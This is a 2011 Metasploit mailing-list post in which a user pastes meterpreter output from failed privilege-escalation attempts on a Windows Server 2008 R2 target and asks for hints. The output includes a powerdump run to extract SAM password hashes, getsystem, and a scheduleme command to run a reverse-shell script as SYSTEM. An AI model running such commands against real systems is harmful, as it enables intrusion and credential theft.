Metasploit mailing list archives
Powerdump / getsystem / privilege escalation on Windows 2008 R2
From: wfdawson <wfdawson () bellsouth net>
Date: Thu, 28 Apr 2011 09:49:22 -0700 (PDT)
Any hints on privilege escalation in Windows 2008 R2 fully patched as of today?

Target is Windows Server 2008 R2.

meterpreter > run powerdump
[*] PowerDump v0.1 - PowerDump to extract Username and Password Hashes...
[*] Running PowerDump to extract Username and Password Hashes...
[*] Uploaded PowerDump as 57501.ps1 to %TEMP%...
[*] Setting ExecutionPolicy to Unrestricted...
[*] Dumping the SAM database through PowerShell...
[-] Error in script: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: The system cannot find the file specified.

Getsystem fails, also.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.

I suppose I simply do not have sufficient privilege for either...

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeChangeNotifyPrivilege

My attempt to set the powershell script restriction policy manually reflects that:

PS C:\> Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy : Access to the registry key 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell' is denied.
At line:1 char:20
+ Set-ExecutionPolicy <<<< Unrestricted
    + CategoryInfo : NotSpecified: (:) [Set-ExecutionPolicy], UnauthorizedAccessException
    + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.SetExecutionPolicyCommand

meterpreter > run scheduleme -c "C:\\User\\Metasploit\\revshell.vbs" -i -u system
[*] Meterpreter is not running under sufficient administrative rights.